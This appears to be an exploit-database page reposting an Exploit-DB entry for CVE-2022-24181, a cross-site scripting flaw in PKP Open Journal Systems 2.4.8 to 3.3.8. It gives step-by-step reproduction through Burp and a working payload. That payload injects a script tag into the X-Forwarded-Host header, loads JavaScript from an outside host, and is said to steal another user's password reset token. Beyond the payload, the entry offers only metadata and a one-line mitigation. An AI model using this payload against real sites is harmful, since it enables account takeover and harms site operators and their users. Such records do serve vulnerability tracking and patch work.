header-logo
Suggest Exploit
vendor:
Open Journals System
by:
Hemant Kashyap
6.1
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Open Journals System
Affected Version From: 2.4.2008
Affected Version To: 3.3.2008
Patch Exists: YES
Related CWE: CVE-2022-24181
CPE: 2.4.8:3.3.8
Metasploit:
Other Scripts:
Tags: cve,cve2022,xss,oss,pkp-lib,edb
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei References: https://www.exploit-db.com/exploits/50881https://github.com/pkp/pkp-lib/issues/7649https://youtu.be/v8-9evO2oVghttps://nvd.nist.gov/vuln/detail/cve-2022-24181
Nuclei Metadata: {'max-request': 1, 'verified': True, 'vendor': 'public_knowledge_project', 'product': 'open_journal_systems'}
Platforms Tested: All OS
2022

PKP Open Journals System 3.3 – Cross-Site Scripting (XSS)

This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability.

Mitigation:

Update to newer version.
Source

Exploit-DB raw data:

# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
# Date: 31/01/2022
# Exploit Author: Hemant Kashyap
# Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649
# Version: PKP Open Journals System 2.4.8 >= 3.3
# Tested on: All OS
# CVE : CVE-2022-24181
# References: https://youtu.be/v8-9evO2oVg

XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce:

  1)  Go to this site: https://who's-using-ojs-software.com
  2)  And capture this request in burp , and send to repeater.
  3)  Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com
  4) And this click on send , after this right click on request and click on show response in browser , after this copy the request.
  5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version.

 This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability

Navigation

Suggest Exploit

Services By CQR